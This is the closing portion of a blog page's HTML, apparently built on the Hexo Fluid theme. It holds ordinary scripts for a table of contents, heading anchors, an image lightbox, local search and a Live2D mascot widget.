      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/DynamicLine.js"></script>
<script src="/js/star.js"></script>
<script src="/js/love.js"></script>
<script src="/js/duration.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
